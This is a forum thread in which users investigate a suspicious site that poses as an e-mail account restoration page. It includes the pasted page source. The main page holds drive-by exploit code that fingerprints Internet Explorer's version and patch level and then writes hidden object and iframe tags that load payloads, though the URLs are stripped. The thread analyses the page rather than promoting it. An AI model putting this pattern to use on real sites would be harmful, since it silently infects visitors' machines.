New Was anyone game to vistit the site with a browser :-)

I used 1 machine to access the web server but immediately got a message
'loading' in the middle of the screen & killed it.

Didn't have the time & wasn't prepared enough for evaluating the damage the site might be up to. My guess is it would be a spyware site that loads (if it can) spyware.

Later tonight I might do a controlled experiment using a Virtual PC & will let you know what transpires.

Doug M
New I did.
Mozilla on Linux - just said that 'my account' was restored.

Imric's Tips for Living
  • Paranoia Is a Survival Trait
  • Pessimists are never disappointed - but sometimes, if they are very lucky, they can be pleasantly surprised...
  • Even though everyone is out to get you, it doesn't matter unless you let them win.

Nothing is as simple as it seems in the beginning,
As hopeless as it seems in the middle,
Or as finished as it seems in the end.
New Page source for main page:
<HTML xmlns:IE>\n<TITLE>Loading...</TITLE>\n    <HEAD>\n         <STYLE type='text/css'>\n            IE:clientCaps {behavior:url(#default#clientcaps)}\n         </STYLE>\n       \n         <SCRIPT language="JavaScript">\n\n            function GetVersion(CLSID)\n            {\n              if (oClientCaps.isComponentInstalled(CLSID,"ComponentID")) \n                 {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");} \n              else \n                 {return Array(0,0,0,0);}\n            }\n         </SCRIPT> \n<meta http-equiv="refresh" content="3; url=thx.html"> \n    </HEAD>\n<BODY>\n [image||||1|1]\n     <IE:clientCaps ID="oClientCaps" />\n\n     <SCRIPT language="JavaScript">\n           if (navigator.appName=="Microsoft Internet Explorer")\n           {\n              var IEversion=navigator.appVersion;\n              var IEplatform=navigator.platform;\n              if (IEplatform.search("Win32") != -1)\n              {\n                 if (IEversion.search("MSIE 5.0") != -1)\n                 {\n     document.write('<object data="[link||]" style="display:none"></object>');\n                 }\n                 if (IEversion.search("MSIE 5.5") != -1)\n                 {\n     document.write('<object data="[link||]" style="display:none"></object>');\n                 }\n                 if (IEversion.search("MSIE 6.0") != -1)\n                 {\n                    var Version_IE  = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");\n                    PatchList = clientInformation.appMinorVersion;\n                    document.write('<iframe src="[link|'+Version_IE+PatchList+'|']"style="display:none"></iframe>');\n     document.write('<object data="[link||]" style="display:none"></object>');              \n                    \n                 }\n              }\n           }\n           \n      </SCRIPT>\n<BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><H2>\n<CENTER>\n<B>Loading....</B></CENTER></H2>\n              \n</BODY>\n</HTML>
Nobody wins in a butter eating contest
New HTML help exploit?
Looks like it is trying to take advantage of one of the many local execution errors common in IE - does not appear to do anything to Mozilla.
Nobody wins in a butter eating contest
New Page source for thx.html
<HTML>\n<TITLE>Thank you!</TITLE>\n    <HEAD>\n         <STYLE type='text/css'>\n            IE:clientCaps {behavior:url(#default#clientcaps)}\n         </STYLE>\n    </HEAD>\n<BODY>\n <BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>\n<CENTER><B>Thank you!<BR><BR>\nNow your e-mail account re-activated!<BR>\n\nSincerely,<BR>\nE-mail Admin.<BR>\n</B></CENTER>\n\n              \n</BODY>\n</HTML>
Nobody wins in a butter eating contest
